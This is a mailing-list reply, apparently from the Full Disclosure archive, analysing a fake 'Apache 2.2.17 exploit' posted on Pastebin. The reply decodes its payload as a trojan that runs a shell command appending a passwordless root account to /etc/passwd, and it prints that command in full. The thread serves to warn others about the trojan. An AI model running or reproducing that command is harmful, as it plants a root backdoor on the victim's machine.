Full Disclosure mailing list archives
Re: Apache 2.2.17 exploit?
From: Security Mailing List <s3clist () hotmail com>
Date: Mon, 3 Oct 2011 23:13:53 +0800
Yeah, sure it is.
1.
if (fork() == 0)
2.
execl("/bin/sh", "sh", "-c", evil, 0);
3.
else
4.
wait(NULL);
This line shows that the code will run "/bin/sh" on local machine and it
has evil[] as a parameter. By decoding evil[], I can get
"?*^1??F??F??FG?vI?^??^M?^??^Q?FU?????NI?VU???????/bin/sh#-c#/bin/echo
w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"
The illegible characters before the first "/bin/sh" could be an assembly
code intended to do evil thing on the local machine. I have not tested
but I assume that it would add a user to a machine that runs this code :D
On 10/4/2011 12:32 AM, Laurelai wrote:
On 10/3/2011 7:31 AM, Darren Martyn wrote:I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/Pretty sure its a trojan. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Apache 2.2.17 exploit? Darren Martyn (Oct 03)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? Darren Martyn (Oct 03)
- Re: Apache 2.2.17 exploit? Security Mailing List (Oct 03)
- Re: Apache 2.2.17 exploit? Vincent Degat (Oct 04)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? adam (Oct 03)
- Message not available
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 03)
